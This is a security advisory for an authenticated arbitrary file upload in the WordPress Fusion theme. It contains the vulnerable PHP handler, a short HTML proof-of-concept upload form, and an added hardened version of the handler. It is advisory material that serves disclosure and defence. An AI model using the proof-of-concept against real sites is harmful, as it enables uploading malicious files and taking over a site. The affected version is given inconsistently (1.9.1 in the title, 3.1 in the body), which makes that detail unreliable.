WordPress Fusion 1.9.1 Arbitrary File Upload

2015.02.14
Credit: Evex
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

------------------------------------------------------------------------------
WordPress Fusion Theme Authenticated Arbitrary File Upload
------------------------------------------------------------------------------

[-] Theme Link:

https://wordpress.org/themes/fusion ( Over 334,000 Downloads )
http://digitalnature.ro/themes/fusion/

[-] Affected Version:

Version 3.1

[-] Vulnerability Description:

The vulnerable code is located in the /functions script:

//SHORTENED CODE
function fusion_options() {
    if ( 'fusion_save' == $_REQUEST['action'] ) {
        // No capability check and no nonce check before the upload is handled
        if ($_FILES["file-logo"]["type"]){
            $directory = $uploadpath['basedir'].'/';
            // The client-supplied file name is used as-is; type and extension are never validated
            move_uploaded_file($_FILES["file-logo"]["tmp_name"], $directory . $_FILES["file-logo"]["name"]);
            update_option('fusion_logoimage', $uploadpath['baseurl']. "/". $_FILES["file-logo"]["name"]);
        }
    }
}
add_action('admin_menu', 'fusion_options');

The function fusion_options is hooked to admin_menu, so it can be called and executed by any LOGGED IN USER. This allows uploading any file to the attacked server, which may lead to a full takeover of the site.

[-] Proof of Concept:

<form action="http://localhost/x/wordpress/wp-admin/admin.php" method="post" enctype="multipart/form-data">
    <input type="file" name="file-logo" />
    <input type="hidden" name="action" value="fusion_save" />
    <button type="submit" >Upload</button>
</form>
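A hardened form of the save handler, as an added example (not the theme's own code and not a vendor patch): it adds the capability check, nonce check and upload validation that the excerpt in the advisory lacks. The function name `fusion_options_hardened`, the nonce action `fusion_save_logo`, the field name `fusion_nonce` and the allowed image types are assumptions; the settings form would have to emit the nonce field with `wp_nonce_field()`.

```php
<?php
// Added example: hardened variant of the handler from the advisory.
// 'fusion_save_logo' and 'fusion_nonce' are hypothetical names.
function fusion_options_hardened() {
    if ( ! isset( $_REQUEST['action'] ) || 'fusion_save' !== $_REQUEST['action'] ) {
        return;
    }

    // 1. Only users who may change theme settings reach the upload path.
    if ( ! current_user_can( 'edit_theme_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    // 2. Reject forged cross-site requests: dies unless a valid nonce is sent.
    check_admin_referer( 'fusion_save_logo', 'fusion_nonce' );

    if ( empty( $_FILES['file-logo']['name'] ) ) {
        return;
    }

    // 3. Let WordPress validate type and extension, sanitize the file name
    //    and store the file, instead of calling move_uploaded_file() directly.
    if ( ! function_exists( 'wp_handle_upload' ) ) {
        require_once ABSPATH . 'wp-admin/includes/file.php';
    }
    $result = wp_handle_upload(
        $_FILES['file-logo'],
        array(
            'test_form' => false, // the nonce check above replaces the form check
            'mimes'     => array( // assumed allow-list: a logo is an image
                'jpg|jpeg' => 'image/jpeg',
                'png'      => 'image/png',
                'gif'      => 'image/gif',
            ),
        )
    );

    if ( isset( $result['error'] ) ) {
        wp_die( esc_html( $result['error'] ) );
    }

    // 4. Store the URL WordPress returned, never the client-supplied name.
    update_option( 'fusion_logoimage', esc_url_raw( $result['url'] ) );
}
add_action( 'admin_menu', 'fusion_options_hardened' );
```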

References:

http://digitalnature.ro/themes/fusion/

